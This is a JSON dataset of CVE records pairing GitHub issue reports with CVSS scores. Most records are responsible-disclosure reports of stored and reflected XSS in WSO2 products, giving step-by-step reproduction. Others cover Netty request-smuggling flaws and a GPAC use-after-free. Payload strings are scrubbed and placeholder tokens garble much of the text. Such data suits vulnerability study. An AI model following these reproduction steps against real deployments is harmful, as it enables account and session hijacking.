NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20436",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/19",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/19",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-11-29T10:51:10Z",
        "description": "Stored Cross Site Scripting (XSS) in WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager NUMBERTAG WSO2 API Manager Analytics NUMBERTAG WSO2 IS as Key Manager NUMBERTAG WSO2 Identity Server NUMBERTAG WSO2 Identity Server Analytics Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request dialect variable is vulnerable to stored cross site scripting (XSS) in the URL, FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable Figure NUMBERTAG Added XSS payload, APITAG gets stored Figure NUMBERTAG Edit the service provider information Figure NUMBERTAG Select the XSS payload stored in the claims Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20437",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/20",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/20",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-11-29T11:09:28Z",
        "description": "Stored Cross Site Scripting (XSS) in APITAG Type\" variable on WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable FILETAG Figure NUMBERTAG Added XSS payload, APITAG gets stored FILETAG Figure NUMBERTAG Edit the service provider information FILETAG Figure NUMBERTAG Select the XSS payload stored in the claims FILETAG Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims FILETAG Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for the latest analysis on WSO2 Identity Server. We'll do the review on this and get back to you soon NUMBERTAG Got mail from WSO2 team saying, APITAG issues reported in Identity Server are under the analyzing state NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20438",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/22",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/22",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2020-01-17T12:35:46Z",
        "description": "Stored Cross Site Scripting (XSS) in 'inline API documentation editor page' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG Content\u201d after creating a document FILETAG Figure NUMBERTAG Clicked on APITAG to add XSS payload FILETAG Figure NUMBERTAG Use APITAG button to Save the document with added \u201cXSS Payload\u201d FILETAG Figure NUMBERTAG Saving and clicking on APITAG back stores the XSS payload and executes in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the APITAG page, APITAG APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Create an API and navigate to doc tag to APITAG APITAG new document\u201d APITAG NUMBERTAG Click on APITAG APITAG content\u201d APITAG after creating a valid document NUMBERTAG Edit the document content value in \u201ccontent\u201d variable with XSS payload, APITAG APITAG NUMBERTAG Now, Whenever the user loads the APITAG page APITAG the stored XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Discovered in WSO2 API Manager version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analyzing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20439",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/21",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/21",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-12-24T10:37:12Z",
        "description": "Reflected Cross Site Scripting (XSS) in 'roles' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Start creating an API FILETAG Figure NUMBERTAG Click on Add Scope button to add resources information FILETAG Figure NUMBERTAG Enter XSS Payload in Roles section FILETAG Figure NUMBERTAG Injected XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. APITAG NUMBERTAG Go to APITAG Design API page APITAG to create API NUMBERTAG Fill the details up to APITAG manage page. APITAG NUMBERTAG Choose Add Scope to include resources information NUMBERTAG Add XSS payload, ERRORTAG in Roles column NUMBERTAG Clicking on Add Scope button executes the injected XSS Payload. APITAG APITAG NUMBERTAG Discovered in WSO2 Identity Server NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analysing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20440",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/24",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/24",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2020-01-20T09:44:04Z",
        "description": "Multiple Reflected Cross Site Scripting (XSS) in APITAG 'version' and APITAG of created API document using XSS payload' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Multiple reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version NUMBERTAG Product. Issue NUMBERTAG Multiple reflected cross site scripting: Figure NUMBERTAG Update the existing document information created. (here API Name is \u2018reflected XSS\u2019) Figure NUMBERTAG Add XSS payload to the variable APITAG Figure NUMBERTAG HTTP Response for the modified APITAG variable with XSS payload. Figure NUMBERTAG Injected XSS payload, APITAG APITAG gets reflected in the browser response. Issue NUMBERTAG Figure NUMBERTAG Injected XSS payload in variable APITAG version and APITAG gets reflected in the Response Figure NUMBERTAG Injected payload gets reflected in the browser THREE times (THREE places) Figure NUMBERTAG Page Looks after executing the injected XSS payload APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. APITAG NUMBERTAG Go to the APITAG page APITAG where an API is already created NUMBERTAG Create a document for the created API by clicking on APITAG New Document\u201d button NUMBERTAG Created documents are listed as shown in figure NUMBERTAG Click on APITAG button to update document information NUMBERTAG Add relevant information and capture the request in proxy to add XSS payload APITAG APITAG \u201d in APITAG variable NUMBERTAG Now, Injected XSS payload gets executed in the browser. Note: Similarly, add XSS payload to the other vulnerable variables \u201cversion\u201d and APITAG which reflects in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, APITAG you for reaching out to WSO2 Platform Security Team. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20441",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/23",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/23",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2020-01-20T07:37:31Z",
        "description": "Stored Cross Site Scripting (XSS) in ' HTTP POST request with a harmful request parameter for context' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Design an API with valid values in the required fields of the page FILETAG Figure NUMBERTAG Click on APITAG Implement\u201d after completing the forms with valid information FILETAG Figure NUMBERTAG alid HTTP Request captured in the proxy with filled information FILETAG Figure NUMBERTAG APITAG variable is added with XSS Payload, APITAG APITAG FILETAG Figure NUMBERTAG Submitted the API details to the server with XSS payload FILETAG Figure NUMBERTAG SS Payload gets stored and reflects whenever the user views the APITAG page. APITAG FILETAG Figure NUMBERTAG Stored XSS payload in the source code APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to the APITAG URL APITAG for creating an API NUMBERTAG Fill all the required information and click on APITAG Implement NUMBERTAG Capture the HTTP request in the proxy and add XSS payload APITAG APITAG \u201d to the \u201ccontext\u201d variable NUMBERTAG Deploy the prototype with added XSS payload NUMBERTAG Injected XSS payload gets reflected whenever the user visits or reloads the APITAG page. APITAG APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for sending new issues. Let us evaluate them and get back to you with the results NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20442",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/25",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/25",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2020-01-20T11:16:47Z",
        "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG APITAG APITAG from the Registry option FILETAG Figure NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page. FILETAG Figure NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable NUMBERTAG Now the injected XSS payload gets stored and executes whenever the user loads the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20443",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/26",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/26",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2020-01-20T11:30:13Z",
        "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Edit APITAG value in APITAG section FILETAG Figure NUMBERTAG Save APITAG with XSS payload, ERRORTAG FILETAG Figure NUMBERTAG Injected XSS payload gets stored to the application FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed in APITAG throughout the page whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Click on Metadata to edit values NUMBERTAG Edit & Save APITAG value with XSS Payload, ERRORTAG NUMBERTAG Now, the injected XSS Payload gets executed whenever the user visits the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20444",
        "Issue_Url_old": "https://github.com/netty/netty/issues/9866",
        "Issue_Url_new": "https://github.com/netty/netty/issues/9866",
        "Repo_new": "netty/netty",
        "Issue_Created_At": "2019-12-10T12:38:14Z",
        "description": "Netty shouldn't allow the invalid fold.. Expected behavior Netty shouldn't allow the invalid fold. According to RFC NUMBERTAG FILETAG CODETAG A Sp or HTAB should follow the CRLF. But Netty allow a CRLF without a SP or HTAB. APITAG Actual behavior Netty accept invalid fold. This may casue http smuggling. Steps to reproduce Send a request like this: APITAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) java version NUMBERTAG OS version (e.g. ERRORTAG ) Darwin APITAG APITAG NUMBERTAG Darwin Kernel Version NUMBERTAG Thu Oct NUMBERTAG PDT NUMBERTAG root:xnu APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20445",
        "Issue_Url_old": "https://github.com/netty/netty/issues/9861",
        "Issue_Url_new": "https://github.com/netty/netty/issues/9861",
        "Repo_new": "netty/netty",
        "Issue_Created_At": "2019-12-09T18:54:41Z",
        "description": "Found two security issue. Expected behavior APITAG accept one Content Length.RFC NUMBERTAG says CODETAG . APITAG accept identity and chunked Transport Encoding In this implementation, the order does not matter (it probably should). The Go implementation only uses the first value of the APITAG to be in sync with the behaviour of AWS ALB. All other valid (gzip, compress, etc.) and invalid TE will return a NUMBERTAG since we don't have readers for them I figured this was the right move, but feel free to correct me Actual behavior NUMBERTAG But netty accept all. APITAG accpet random TE. Steps to reproduce Use two CL to reproduce the first. Use a chunked TE header and a random TE header. Smiliar with NUMBERTAG URLTAG . It also cause http smuggling. Or see the other issue benoitc/gunicorn NUMBERTAG URLTAG and the PR benoitc/gunicorn NUMBERTAG URLTAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20628",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1269",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1269",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-06T00:10:37Z",
        "description": "Use After Free APITAG Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG efb0 at pc NUMBERTAG d bp NUMBERTAG ffd5d0bb3c0 sp NUMBERTAG ffd5d0bb3b0 WRITE of size NUMBERTAG at NUMBERTAG efb0 thread T NUMBERTAG c in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ce NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG NUMBERTAG efb0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG previously allocated by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG ~~~ Thanks, Manh Dung",
